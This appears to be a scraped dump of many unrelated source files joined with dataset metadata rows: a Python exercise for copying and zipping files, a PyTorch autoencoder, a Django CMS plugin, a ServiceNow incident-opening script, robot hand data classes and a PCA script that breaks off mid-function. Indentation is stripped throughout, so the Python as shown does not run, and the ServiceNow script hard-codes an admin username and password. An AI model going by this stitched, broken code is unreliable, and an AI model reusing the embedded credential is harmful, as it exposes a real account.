# Copyright 2010 Google Inc.
# Licensed under the Apache License, Version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
# Google's Python Class
# http://code.google.com/edu/languages/google-python-class/
import sys
import re
import os
import shutil
import subprocess
import zipfile
"""
Copy Special exercise
"""
# +++your code here+++
# Write functions and modify main() to call them
def get_special_paths(directory):
"""
Returns a list of the absolute paths of the special files in the given directory.
"special" file is one where the name contains the pattern __w__ somewhere,
where the w is one or more word chars.
"""
special_files = []
filenames = os.listdir(directory)
for filename in filenames:
special_file_match = re.search(r'__\w+__', filename)
if special_file_match:
special_files.append(os.path.abspath(os.path.join(directory, filename)))
return special_files
def copy_to(paths, directory):
"""
Copy all paths to given directory
"""
if not os.path.exists(directory):
os.mkdir(directory)
for path in paths:
shutil.copy(path, directory)
def zip_to(paths, zip_path):
"""
Add all files from given paths to zip file
"""
# REVIEW: did you mean: zipfile.ZipFile(zip_path, 'w')
with zipfile.ZipFile(zip_path, 'w') as zipf:
for path in paths:
zipf.write(path)
def zip_to_command(paths, zip_path):
"""
Add all files from given paths to zip file
"""
subprocess.run(['zip', '-j', zip_path] + paths)
def main():
# This basic command line argument parsing code is provided.
# Add code to call your functions below.
# Make a list of command line arguments, omitting the [0] element
# which is the script itself.
args = sys.argv[1:]
if not args:
print("usage: [--todir dir][--tozip zipfile] dir [dir ...]")
sys.exit(1)
# todir and tozip are either set from command line
# or left as the empty string.
# The args array is left just containing the dirs.
to_dir = ''
if args[0] == '--todir':
to_dir = args[1]
del args[0:2]
to_zip = ''
if args[0] == '--tozip':
to_zip = args[1]
del args[0:2]
if len(args) == 0:
print("error: must specify one or more dirs")
sys.exit(1)
# +++your code here+++
# Call your functions
for directory in args:
paths = get_special_paths(directory)
if to_dir:
copy_to(paths, to_dir)
elif to_zip:
zip_to_command(paths, to_zip)
else:
print('\n'.join(paths))
if __name__ == "__main__":
main()
| 24.862385 | 85 | 0.627306 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,272 | 0.469373 |
337c43e3035cea7241ab7d941456f0a2c78bf961 | 2,054 | py | Python | models/autoencoder_model.py | piyushkaul/information_geometry | 56b2800e6e8b8d5c6a9a02a42a79ee86ab613d8c | [
"MIT"
] | null | null | null | models/autoencoder_model.py | piyushkaul/information_geometry | 56b2800e6e8b8d5c6a9a02a42a79ee86ab613d8c | [
"MIT"
] | null | null | null | models/autoencoder_model.py | piyushkaul/information_geometry | 56b2800e6e8b8d5c6a9a02a42a79ee86ab613d8c | [
"MIT"
] | null | null | null | import torch.nn as nn
from core.fim_model import ModelFIM
import torch
features = [784,1000,500,250,30]
class Autoencoder(ModelFIM):
def __init__(self, args, init_from_rbm=False, hook_enable=True, logger=None):
super(Autoencoder, self).__init__(args)
self.encoder = nn.Sequential(
nn.Linear(features[0], features[1]),
nn.Sigmoid(),
nn.Linear(features[1], features[2]),
nn.Sigmoid(),
nn.Linear(features[2], features[3]),
nn.Sigmoid(),
nn.Linear(features[3], features[4]))
self.decoder = nn.Sequential(
nn.Linear(features[4], features[3]),
nn.Sigmoid(),
nn.Linear(features[3], features[2]),
nn.Sigmoid(),
nn.Linear(features[2], features[1]),
nn.Sigmoid(),
nn.Linear(features[1], features[0]),
nn.Sigmoid())
super(Autoencoder, self).common_init(args, hook_enable=hook_enable, logger=logger)
if init_from_rbm:
self.init_from_rbm()
def init_from_rbm(self):
enc_layers = [0, 2, 4, 6]
dec_layers = [6, 4, 2, 0]
for rbm_idx in range(4):
file_name = 'rbm' + str(rbm_idx) + '.pt'
loaded = torch.load(file_name)
print('Encoder: orig_shape = {}, loaded_shape={}'.format(self.encoder[enc_layers[rbm_idx]].weight.data.shape, loaded['weights'].data.shape))
print('Decoder: orig_shape = {}, loaded_shape={}'.format(self.decoder[dec_layers[rbm_idx]].weight.data.shape, loaded['weights'].data.shape))
self.encoder[enc_layers[rbm_idx]].weight.data.copy_(loaded['weights'].data.T)
self.encoder[enc_layers[rbm_idx]].bias.data.copy_(loaded['bias_fwd'].data)
self.decoder[dec_layers[rbm_idx]].weight.data.copy_(loaded['weights'].data)
self.decoder[dec_layers[rbm_idx]].bias.data.copy_(loaded['bias_back'].data)
def forward(self, x):
x = self.encoder(x)
x = self.decoder(x)
return x
| 40.27451 | 152 | 0.598832 | 1,945 | 0.946933 | 0 | 0 | 0 | 0 | 0 | 0 | 153 | 0.074489 |
337dd50916fb840e7091ed51530bebf7c3ed34d3 | 188 | py | Python | tests/test.py | ZhenningLang/py-proj-init | f6e0da044c4e3140537ac6c4240124c071e89261 | [
"MIT"
] | null | null | null | tests/test.py | ZhenningLang/py-proj-init | f6e0da044c4e3140537ac6c4240124c071e89261 | [
"MIT"
] | null | null | null | tests/test.py | ZhenningLang/py-proj-init | f6e0da044c4e3140537ac6c4240124c071e89261 | [
"MIT"
] | null | null | null | import os
import sys
CURRENT_PATH = os.path.split(os.path.realpath(__file__))[0]
sys.path.append(os.path.join(CURRENT_PATH, '..'))
from py_proj_init.__main__ import main # noqa
main()
| 18.8 | 59 | 0.744681 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 | 0.053191 |
337f5a2410ae79413a6e7633d2512fb55d86d5f7 | 4,620 | py | Python | pysimpleframe/interface/display/tables/NavigationTable.py | OriDevTeam/PySimpleFrame | 105654736a0ecc2ddb00921f1bc139faeaba2c84 | [
"BSD-3-Clause"
] | null | null | null | pysimpleframe/interface/display/tables/NavigationTable.py | OriDevTeam/PySimpleFrame | 105654736a0ecc2ddb00921f1bc139faeaba2c84 | [
"BSD-3-Clause"
] | null | null | null | pysimpleframe/interface/display/tables/NavigationTable.py | OriDevTeam/PySimpleFrame | 105654736a0ecc2ddb00921f1bc139faeaba2c84 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Name: TOFILL\n
Description: TOFILL
"""
"""PySimpleFrame
Author: Miguel Silva
License: Check LICENSE file
"""
## System imports ##
## Library imports ##
import termtables
from colorama import Fore, Back, Style
## Application imports ##
from pysimpleframe.interface.display import Display
class NavigationTable:
def __init__(self, header, data, amount, width=60):
## Reference header list
self.Header = header
## Reference data list
self.Data = data
## Insert the selected label text at header beginning
self.Header.insert(0, "X")
## The width of the table (default 60)
self.width = width
## The amount to show in the table
self.showAmount = amount
## The page to show in the table
self.page = 1
## The selected table item index
self.selectedIndex = 1
## The current displaying table
self.table = None
def __del__(self):
pass
def ShowTable(self):
## Reference the data count
dataCount = len(self.Data)
## Check if there is any data to show
if dataCount < 1:
Display.Print("There isn't any data to show")
return
## Calculate the page amount
pageCount = max(dataCount / self.showAmount, 1)
idx = 0 ## Initial index
startIdx = self.showAmount * self.page ## Starting index
startIdx = startIdx if startIdx < dataCount else 0 ## Starting index
endIdx = startIdx + self.showAmount ## Ending index
endIdx = endIdx if dataCount > endIdx else dataCount ## Ending index
localSelectedIndex = ((self.selectedIndex - 1) % self.showAmount) + 1
## Create the data table item list
dataTableItemList = []
for i in range(int(startIdx), int(endIdx)):
## Reference the data item by index
dataItem = self.Data[i]
## Create the data item list
dataItemList = []
## Increase the local index
idx += 1
## Append the index selection status
dataItemList.append("x" if idx == localSelectedIndex else "")
## Append the data items for the selection and fill the data list
for item in dataItem:
dataItemList.append(item)
dataTableItemList.append(dataItemList)
## Generate the data table by list
self.table = table = termtables.to_string(
dataTableItemList,
header = self.Header,
style = termtables.styles.ascii_thin_double,
)
## Print the accounts data table
Display.Print(table)
## Show the table details
self.ShowNavigationLabel(self.page, self.selectedIndex)
def ShowNavigationLabel(self, page, selectedIndex):
## Display the status of the table navigation
if page <= 1:
Display.Print('{:^94s}'.format("Page %u/%u : Selected %u/%u | %u >>" %
(page, self.__GetPageCount(),
selectedIndex, self.__GetItemCount(), page + 1)))
elif page >= self.__GetPageCount():
Display.Print('{:^94s}'.format("<< %u | Page %u/%u : Selected %u/%u" %
(page - 1, page, self.__GetPageCount(),
selectedIndex, self.__GetItemCount())))
else:
Display.Print('{:^94s}'.format("<< %u | Page %u/%u : Selected %u/%u | %u >>" %
(page - 1, page, self.__GetPageCount(),
selectedIndex, self.__GetItemCount(), page + 1)))
## Make a space to divide
Display.Print("")
def __GetItemCount(self):
## Return the data item count
return len(self.Data)
def __GetPageCount(self):
## Calculate the page amount
pageAmount = max(self.__GetItemCount() / self.showAmount, 1)
## Return the page amount
return pageAmount
def __GetSelectedSessionIndex():
return self.page * self.showAmount + self.selectedIndex
def ChangeSelected(self, amount):
## Check if the data item amount is greater than the data item count
if self.selectedIndex + amount > self.__GetItemCount():
self.selectedIndex = self.__GetItemCount()
## Check if the session amount is less than 0
elif self.selectedIndex + amount < 1:
self.selectedIndex = 1
## Change the session index
else:
self.selectedIndex += amount
## Recalculate the page index
if self.selectedIndex > self.showAmount:
self.page = int((self.selectedIndex - 1) / self.showAmount) + 1
else:
self.page = 1
def ChangePage(self, amount):
## Check if the page amount is greater than the page count
if self.page + amount > self.__GetPageCount():
self.page = self.__GetPageCount()
## Check if the page amount if less than 0
elif self.page + amount < 1:
self.page = 1
## Change the page count
else:
self.page += amount
## Reset the selected index to default
self.selectedIndex = (self.page - 1) * self.showAmount + 1
| 26.25 | 82 | 0.670563 | 4,260 | 0.922078 | 0 | 0 | 0 | 0 | 0 | 0 | 1,656 | 0.358442 |
337fb62497c441679efa5ff81eacc164419c490b | 458 | py | Python | setup.py | Julian/giraffe | 8ef37fcb0a7cc5aa24c684d17568c55ad04692dc | [
"MIT"
] | 1 | 2017-05-02T21:28:02.000Z | 2017-05-02T21:28:02.000Z | setup.py | Julian/giraffe | 8ef37fcb0a7cc5aa24c684d17568c55ad04692dc | [
"MIT"
] | null | null | null | setup.py | Julian/giraffe | 8ef37fcb0a7cc5aa24c684d17568c55ad04692dc | [
"MIT"
] | null | null | null | from distutils.core import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
setup(
name="giraffe",
version="0.1",
package_dir={"giraffe" : ""},
packages=["giraffe"],
cmdclass = {'build_ext': build_ext},
ext_modules = [
Extension("graph", ["giraffe/graph.pyx"]),
Extension("graph_mixin", ["giraffe/graph_mixin.pyx"]),
]
)
| 28.625 | 75 | 0.576419 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 109 | 0.237991 |
3382bb7349a27982996e8cd4a61dd6fd63ae8070 | 2,267 | py | Python | library/github/tests/Issue494.py | Sangraha/Github-to-S3 | e88345dc800b2b2f7ec10ee10bb864582335f1ad | [
"Apache-2.0"
] | null | null | null | library/github/tests/Issue494.py | Sangraha/Github-to-S3 | e88345dc800b2b2f7ec10ee10bb864582335f1ad | [
"Apache-2.0"
] | null | null | null | library/github/tests/Issue494.py | Sangraha/Github-to-S3 | e88345dc800b2b2f7ec10ee10bb864582335f1ad | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
############################ Copyrights and license ############################
# #
# Copyright 2016 Sam Corbett <sam.corbett@cloudsoftcorp.com> #
# Copyright 2018 sfdye <tsfdye@gmail.com> #
# #
# This file is part of PyGithub. #
# http://pygithub.readthedocs.io/ #
# #
# PyGithub is free software: you can redistribute it and/or modify it under #
# the terms of the GNU Lesser General Public License as published by the Free #
# Software Foundation, either version 3 of the License, or (at your option) #
# any later version. #
# #
# PyGithub is distributed in the hope that it will be useful, but WITHOUT ANY #
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS #
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more #
# details. #
# #
# You should have received a copy of the GNU Lesser General Public License #
# along with PyGithub. If not, see <http://www.gnu.org/licenses/>. #
# #
################################################################################
from . import Framework
class Issue494(Framework.TestCase):
def setUp(self):
Framework.TestCase.setUp(self)
self.repo = self.g.get_repo("apache/brooklyn-server")
self.pull = self.repo.get_pull(465)
def testRepr(self):
expected = 'PullRequest(title="Change SetHostnameCustomizer to check if ' \
'/etc/sysconfig/network exist…", number=465)'
self.assertEqual(self.pull.__repr__(), expected)
| 58.128205 | 83 | 0.422144 | 434 | 0.191274 | 0 | 0 | 0 | 0 | 0 | 0 | 1,916 | 0.844425 |
3383b63311713ea3400e46bf259718c4551057ed | 921 | py | Python | modules/report6.py | Seyon7/report | ac8b4778287cbc0f9c48aca61e65f41ef612d385 | [
"MIT"
] | null | null | null | modules/report6.py | Seyon7/report | ac8b4778287cbc0f9c48aca61e65f41ef612d385 | [
"MIT"
] | null | null | null | modules/report6.py | Seyon7/report | ac8b4778287cbc0f9c48aca61e65f41ef612d385 | [
"MIT"
] | null | null | null | import click
from modules.processor import build_report, print_report
@click.group(invoke_without_command=True)
@click.option('--files', '-f', required=True, type=str, prompt="Provide the path to data files")
@click.pass_context
def cli_root(ctx, files):
ctx.meta['files'] = files
@cli_root.command()
@click.argument('name', type=str)
@click.pass_context
def driver(ctx, name):
files = ctx.meta['files']
report = build_report(files, driver=name)
print_report(report)
@cli_root.command()
@click.argument('order', type=click.Choice(["asc", "desc"]), default="asc")
@click.pass_context
def ls(ctx, order):
files = ctx.meta['files']
if order not in ("asc", "desc"):
raise IOError("'Wrong sorting direction")
report = build_report(files, order=order)
# добавить логинку того, что если нет error_log, то это это ошибка. подумать, куда добавть эту проверку
print_report(report)
| 29.709677 | 107 | 0.710098 | 0 | 0 | 0 | 0 | 915 | 0.920523 | 0 | 0 | 308 | 0.309859 |
3384b78fcc5bcef1498e5ddfdbf1f5b8988cca4c | 538 | py | Python | backend/search_algorithms/search_result.py | akashmunjial/CS520 | f399427b3946358950feb357fa9e94b447c826ee | [
"MIT"
] | 1 | 2021-05-07T12:26:39.000Z | 2021-05-07T12:26:39.000Z | backend/search_algorithms/search_result.py | akashmunjial/CS520 | f399427b3946358950feb357fa9e94b447c826ee | [
"MIT"
] | null | null | null | backend/search_algorithms/search_result.py | akashmunjial/CS520 | f399427b3946358950feb357fa9e94b447c826ee | [
"MIT"
] | null | null | null | class SearchResult(object):
"""Class representing a return object for a search query.
Attributes:
path: An array representing the path from a start node to the end node, empty if there is no path.
path_len: The length of the path represented by path, 0 if path is empty.
ele_gain: The cumulative elevation gain through the path, 0 if path is empty.
"""
def __init__(self, path=[], path_len=0, ele_gain=0):
self.path = path
self.path_len = path_len
self.ele_gain = ele_gain
| 41.384615 | 106 | 0.672862 | 537 | 0.998141 | 0 | 0 | 0 | 0 | 0 | 0 | 357 | 0.663569 |
338533386fe5a86b5d7b0d4e0de9f37f1da09eea | 2,531 | py | Python | tech_project/lib/python2.7/site-packages/djangocms_picture/cms_plugins.py | priyamshah112/Project-Descripton-Blog | 8e01016c6be79776c4f5ca75563fa3daa839e39e | [
"MIT"
] | null | null | null | tech_project/lib/python2.7/site-packages/djangocms_picture/cms_plugins.py | priyamshah112/Project-Descripton-Blog | 8e01016c6be79776c4f5ca75563fa3daa839e39e | [
"MIT"
] | null | null | null | tech_project/lib/python2.7/site-packages/djangocms_picture/cms_plugins.py | priyamshah112/Project-Descripton-Blog | 8e01016c6be79776c4f5ca75563fa3daa839e39e | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from cms.plugin_base import CMSPluginBase
from cms.plugin_pool import plugin_pool
from django.conf import settings
from django.utils.translation import ugettext_lazy as _
from .forms import PictureForm
from .models import Picture
# enable nesting of plugins inside the picture plugin
PICTURE_NESTING = getattr(settings, 'DJANGOCMS_PICTURE_NESTING', False)
class PicturePlugin(CMSPluginBase):
model = Picture
form = PictureForm
name = _('Image')
allow_children = PICTURE_NESTING
text_enabled = True
fieldsets = [
(None, {
'fields': (
'picture',
'external_picture',
)
}),
(_('Advanced settings'), {
'classes': ('collapse',),
'fields': (
'template',
'use_responsive_image',
('width', 'height'),
'alignment',
'caption_text',
'attributes',
)
}),
(_('Link settings'), {
'classes': ('collapse',),
'fields': (
('link_url', 'link_page'),
'link_target',
'link_attributes',
)
}),
(_('Cropping settings'), {
'classes': ('collapse',),
'fields': (
('use_automatic_scaling', 'use_no_cropping'),
('use_crop', 'use_upscale'),
'thumbnail_options',
)
})
]
def get_render_template(self, context, instance, placeholder):
return 'djangocms_picture/{}/picture.html'.format(instance.template)
def render(self, context, instance, placeholder):
if instance.alignment:
classes = 'align-{} '.format(instance.alignment)
classes += instance.attributes.get('class', '')
# Set the class attribute to include the alignment html class
# This is done to leverage the attributes_str property
instance.attributes['class'] = classes
# assign link to a context variable to be performant
context['picture_link'] = instance.get_link()
context['picture_size'] = instance.get_size(
width=float(context.get('width') or 0),
height=float(context.get('height') or 0),
)
context['img_srcset_data'] = instance.img_srcset_data
return super(PicturePlugin, self).render(context, instance, placeholder)
plugin_pool.register_plugin(PicturePlugin)
| 32.037975 | 80 | 0.566574 | 2,101 | 0.830107 | 0 | 0 | 0 | 0 | 0 | 0 | 785 | 0.310154 |
3385d0740834d136b94244297d0e01af822e4328 | 622 | py | Python | Blatt1/src/script.py | lewis206/Computational_Physics | 06ad6126685eaf65f5834bfe70ebd91b33314395 | [
"MIT"
] | null | null | null | Blatt1/src/script.py | lewis206/Computational_Physics | 06ad6126685eaf65f5834bfe70ebd91b33314395 | [
"MIT"
] | null | null | null | Blatt1/src/script.py | lewis206/Computational_Physics | 06ad6126685eaf65f5834bfe70ebd91b33314395 | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
import matplotlib
# Set fontsize larger for latex plots
matplotlib.rcParams.update({'font.size': 20})
# Generate data from file
x, y = np.genfromtxt("bin/python_Aufgabe2.txt", unpack=True)
m, n = x[-1], y[-1]
# Plotting
plt.figure(figsize=(12,7))
plt.grid()
plt.xlabel("x")
plt.ylabel("y")
x_new = np.linspace(min(x)-x[:-1].std()/2, max(x)+x[:-1].std()/2)
plt.plot(x[:-1], y[:-1], "x", mew=2., alpha=2, label="Datenpunkte")
plt.plot(x_new, m*x_new+n, "-", linewidth=3, label="Ausgleichsgerade")
plt.legend()
plt.tight_layout()
plt.savefig("bin/figure.pdf", dpi=1200)
| 27.043478 | 70 | 0.680064 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 167 | 0.268489 |
33868319c19ba1edc4a009ab8aec531548edc673 | 1,350 | py | Python | editregions/migrations/0001_initial.py | kezabelle/django-editregions | 961ddeffb37d30d40fb4e3e9224bc3f956b7a5b5 | [
"BSD-2-Clause-FreeBSD"
] | 1 | 2015-01-11T18:21:27.000Z | 2015-01-11T18:21:27.000Z | editregions/migrations/0001_initial.py | kezabelle/django-editregions | 961ddeffb37d30d40fb4e3e9224bc3f956b7a5b5 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | editregions/migrations/0001_initial.py | kezabelle/django-editregions | 961ddeffb37d30d40fb4e3e9224bc3f956b7a5b5 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import editregions.utils.regions
class Migration(migrations.Migration):
dependencies = [
('contenttypes', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='EditRegionChunk',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('content_id', models.CharField(max_length=255, db_index=True)),
('region', models.CharField(max_length=75, validators=[editregions.utils.regions.validate_region_name])),
('position', models.PositiveIntegerField(default=None, db_index=True)),
('content_type', models.ForeignKey(related_name='+', to='contenttypes.ContentType')),
],
options={
'ordering': ['position'],
'abstract': False,
'db_table': 'editregions_editregionchunk',
'verbose_name': 'content block',
'verbose_name_plural': 'content blocks',
},
bases=(models.Model,),
),
]
| 37.5 | 121 | 0.586667 | 1,208 | 0.894815 | 0 | 0 | 0 | 0 | 0 | 0 | 303 | 0.224444 |
3386cfd4a875f26af378b42735047ac756a1b6cf | 887 | py | Python | histVarPng.py | AineNicD/pands-project | 55f7dbab4f106f4776be4e0248c941a4246e64ac | [
"MIT"
] | null | null | null | histVarPng.py | AineNicD/pands-project | 55f7dbab4f106f4776be4e0248c941a4246e64ac | [
"MIT"
] | null | null | null | histVarPng.py | AineNicD/pands-project | 55f7dbab4f106f4776be4e0248c941a4246e64ac | [
"MIT"
] | null | null | null | #Saves a historgram of each variable to png files
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
#read data
data = pd.read_csv("irisDataSet.csv")
#names of variables
names = ['sepal_length', 'sepal_width', 'petal_length', 'petal_width', 'species']
# seperating by species
setosa =data[data['species']=='setosa']
versicolor =data[data['species']=='versicolor']
virginica =data[data['species']=='virginica']
#outputs histograms
setosa.hist()
versicolor.hist()
virginica.hist()
#saves each historgram to png files with their species title
plt.savefig("setosa.png")
plt.savefig("versicolor.png")
plt.savefig("virginica.png")
plt.show()
# Ian Mc Loughlin lecture on plots
#data frame code for each species from https://www.kaggle.com/abhishekkrg/python-iris-data-visualization-and-explanation
| 22.74359 | 121 | 0.723788 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 524 | 0.590755 |
3387d6dfab24bbf352088172ca1497dc6db9c9b1 | 712 | py | Python | build.py | LagoLunatic/GCFT | d838614804058c7b7ea5c62b37251a2795f5c791 | [
"MIT"
] | 38 | 2020-01-14T01:20:15.000Z | 2022-02-15T00:03:33.000Z | build.py | LagoLunatic/GCFT | d838614804058c7b7ea5c62b37251a2795f5c791 | [
"MIT"
] | 7 | 2020-01-13T18:08:07.000Z | 2022-01-13T02:20:30.000Z | build.py | LagoLunatic/GCFT | d838614804058c7b7ea5c62b37251a2795f5c791 | [
"MIT"
] | 1 | 2021-09-23T19:30:55.000Z | 2021-09-23T19:30:55.000Z |
from zipfile import ZipFile
import os
from version import VERSION
base_name = "GameCube File Tools"
base_name_with_version = base_name + " " + VERSION
import struct
if (struct.calcsize("P") * 8) == 64:
base_name_with_version += "_64bit"
base_zip_name = base_name_with_version
else:
base_name_with_version += "_32bit"
base_zip_name = base_name_with_version
zip_name = base_zip_name.replace(" ", "_") + ".zip"
exe_path = "./dist/%s.exe" % base_name_with_version
if not os.path.isfile(exe_path):
raise Exception("Executable not found: %s" % exe_path)
with ZipFile("./dist/" + zip_name, "w") as zip:
zip.write(exe_path, arcname="%s.exe" % base_name)
zip.write("README.md", arcname="README.txt")
| 26.37037 | 56 | 0.723315 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 139 | 0.195225 |
338824f1551a38d9cfd8d8f7b8e6193c7a8c97ff | 2,894 | py | Python | Settings/RobotData.py | xzhang-wr/DAnTE_V2 | 8b433973aa5ab47ef237d8dfaca6232a6d9f526b | [
"Apache-2.0"
] | null | null | null | Settings/RobotData.py | xzhang-wr/DAnTE_V2 | 8b433973aa5ab47ef237d8dfaca6232a6d9f526b | [
"Apache-2.0"
] | null | null | null | Settings/RobotData.py | xzhang-wr/DAnTE_V2 | 8b433973aa5ab47ef237d8dfaca6232a6d9f526b | [
"Apache-2.0"
] | null | null | null | #!usr/bin/env python
__author__ = "X Zhang"
__email__ = "xzhang@westwoodrobotics.net"
__copyright__ = "Copyright 2020 Westwood Robotics Corp."
__date__ = "Feb 14, 2020"
__version__ = "0.1.0"
__status__ = "Beta"
from Settings.Constants_DAnTE import *
import math
import numpy as np
class FingerDataStructure(object):
def __init__(self, name, motor_id, mirrored, encoder=None):
# Finger info
self.name = name
self.motor_id = motor_id
self.mirrored = mirrored # True of False, if the finger drive mechanism is mirrored from the thumb
self.homing_offset = 0 # Homing_offset for BEAR so that when finger is fully open, BEAR is at 0
self.travel = 0 # Total travel of BEAR for finger to close
self.initialized = False # Finger has been initialized
self.contact = False # Object contact status
self.encoder = encoder # Encoder pin# on Pi
self.encoder_offset = -1 # Offset value for the encoder when finger is fully open
self.angles = [0, 0, 0, 0] # Phalanx angles, [alpha, beta, gamma, delta]
self.joint_locations = np.zeros([4, 3]) # 3D joint_locations = [MCP; PIP; DIP; Tip]
class PalmDataStructure(object):
def __init__(self, name, motor_id):
# Palm info
self.name = name
self.motor_id = motor_id
self.homing_offset = 0 # Homing_offset for Dynamixel, if any.
self.travel = math.pi/2 # Total travel of BEAR for INDEX fingers to turn from parallel to pinch
self.home = 0 # Home position for Dynamixel so that index fingers are in parallel
self.initialized = False # Palm has been initialized
self.gesture = None # Hand gesture status
self.angle = 0 # theta
# Sensors to be added.
class RobotDataStructure(object):
def __init__(self, name, BEAR_port, BEAR_baudrate, DXL_port, DXL_baudrate, palm=None, fingerlist=None):
# Overall system info
self.name = name
self.BEAR_baudrate = BEAR_baudrate
self.BEAR_port = BEAR_port
self.DXL_baudrate = DXL_baudrate
self.DXL_port = DXL_port
if palm is None:
palm = PalmDataStructure("PALM", DXL_PALM)
if fingerlist is None: # If no finger specified, assume there is only a THUMB
fingerlist = [FingerDataStructure("THUMB", BEAR_THUMB, False)]
self.palm = palm
self.fingerlist = fingerlist
self.finger_count = len(self.fingerlist) # number of fingers
self.finger_ids = []
self.encoders = []
for f in fingerlist:
self.finger_ids.append(f.motor_id)
self.encoders.append(f.encoder) # Create a cluster of encoder pins
self.initialized = False # Full hand has been initialized
self.contact = False # Object contact status
self.booted = False # System has booted
| 37.584416 | 107 | 0.658604 | 2,600 | 0.898411 | 0 | 0 | 0 | 0 | 0 | 0 | 1,020 | 0.352453 |
3388f9df9b80255086f1204a7c8b7e0f3646bb15 | 2,012 | py | Python | src/main/resources/servicenow/OpenTicket.py | xdanw/xld-servicenow-incidentlog | 9ae4ccf5a110dab0294aa38cd04b2abc8615acba | [
"MIT"
] | null | null | null | src/main/resources/servicenow/OpenTicket.py | xdanw/xld-servicenow-incidentlog | 9ae4ccf5a110dab0294aa38cd04b2abc8615acba | [
"MIT"
] | null | null | null | src/main/resources/servicenow/OpenTicket.py | xdanw/xld-servicenow-incidentlog | 9ae4ccf5a110dab0294aa38cd04b2abc8615acba | [
"MIT"
] | null | null | null |
import json
import requests
import requests.utils
# Fixes some issues with TLS
import os
os.environ['REQUESTS_CA_BUNDLE'] = 'ca.pem';
# --- Debug Purposes Only, Server Config Is Hard Coded ---
#
#
# print "Debug ... " + deployed.ResultUri;
# response = requests.get('https://webhook.site/062e2ea7-5a36-4abb-a2c8-862dd85f777f')
# print response.status_code;
task = context.getTask()
# Debug
# print "Task info?"
# print str(task.getId());
# print str(task.getUsername());
# print str(task.getMetadata());
msg = "Message: " + str(task.getMetadata()['application']) + \
" (ver: " + str(task.getMetadata()['version']) + ") " + \
"is being deployed to: " + str(task.getMetadata()['environment']) + \
" by user: " + str(task.getUsername());
print msg;
# --- ServiceNow API ---
# per https://docs.servicenow.com/bundle/london-application-development/page/integrate/inbound-rest/concept/c_TableAPI.html
# Set the request parameters
url = 'https://dev58646.service-now.com/api/now/table/incident'
# Eg. User name="admin", Password="admin" for this code sample.
user = 'admin'
pwd = 'dgZyGsSI6L7z'
# Set proper headers
headers = {"Content-Type":"application/json","Accept":"application/json"}
# Do the HTTP request
data = "{'short_description':'" + msg +"','urgency':'5','impact':'5'}"
response = requests.post(url, auth=(user, pwd), headers=headers ,data=data)
# Check for HTTP codes other than 200 and 201
if response.status_code != 200 and response.status_code != 201:
print('Status:', response.status_code, 'Headers:', response.headers, 'Error Response:',response.json())
raise exception;
# Decode the JSON response into a dictionary and use the data
data = response.json()
# print(data)
# responseData = json.loads(data)
# print str(responseData.get('result').get('sys_id')); # Get sys_id
# --- End API ---
context.setAttribute('ticket_sys_id', str(data['result']['sys_id']))
print 'Storing attribute... sys_id: ' + context.getAttribute('ticket_sys_id');
print "Ticket opened.";
| 30.484848 | 123 | 0.695328 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,321 | 0.656561 |
338945537366a67604118a7d7b4f22b6a5da388b | 4,318 | py | Python | code/joint_pca.py | craig-willis/SOMOSPIE | 0e2b43bd047252d992bc533285a3469ea5d60e09 | [
"BSD-3-Clause"
] | null | null | null | code/joint_pca.py | craig-willis/SOMOSPIE | 0e2b43bd047252d992bc533285a3469ea5d60e09 | [
"BSD-3-Clause"
] | null | null | null | code/joint_pca.py | craig-willis/SOMOSPIE | 0e2b43bd047252d992bc533285a3469ea5d60e09 | [
"BSD-3-Clause"
] | 3 | 2020-02-14T14:31:50.000Z | 2022-01-04T16:51:40.000Z | #!/usr/bin/env python3
# This script assumes that the non-numerical column headers
# in train and predi files are identical.
# Thus the sm header(s) in the train file must be numeric (day/month/year).
import sys
import numpy as np
import pandas as pd
from sklearn.decomposition import PCA #TruncatedSVD as SVD
from sklearn.preprocessing import StandardScaler
from sklearn.pipeline import Pipeline
def mask(df, f):
return df[f(df)]
def is_int(val):
try:
int(val)
return True
except:
return False
def remove_sparse_rows(data, error=-99999.0):
data_matrix = data.as_matrix()
data_matrix = [row for row in data_matrix if error in row]
return pd.DataFrame(data_matrix, columns=data.columns)
def fit_data(train_data, num_comps="mle"):
# Build pipeline and fit it to training data.
scaler = StandardScaler()
# https://github.com/scikit-learn/scikit-learn/issues/9884
pca = PCA(n_components=num_comps, svd_solver="full")
pipeline = Pipeline([("scaler", scaler), ("pca", pca)])
pipeline.fit(train_data)
return pipeline
#Select the target number of components.
# Uses Avereage Eigenvalue technique from:
# http://pubs.acs.org/doi/pdf/10.1021/ie990110i
def choose_num_comps(train_data, bound=1):
model = fit_data(train_data)
eigenvals = model.named_steps['pca'].explained_variance_
#print(f"eigenvals:\n{eigenvals}\n")
return len([ev for ev in eigenvals if (ev >= bound)])
# Assumes the first two columns are x/y-coordinates
# and integer-headed columns are sm data, not covariates.
def get_params(data):
columns = list(data.columns)[2:]
return [col for col in columns if not is_int(col)]
# Apply to {df} pca transformatio {model}
# that maps {params}-headed data to {num_comps} new columns.
def apply_model(df, model, params, num_comps):
pre_model = df[params]
post_model = model.transform(pre_model)
#print(f"one row of post_model:\n{post_model[0]}")
new_cols = [f"Component{i}" for i in range(num_comps)]
post_model = pd.DataFrame(post_model, columns=new_cols)
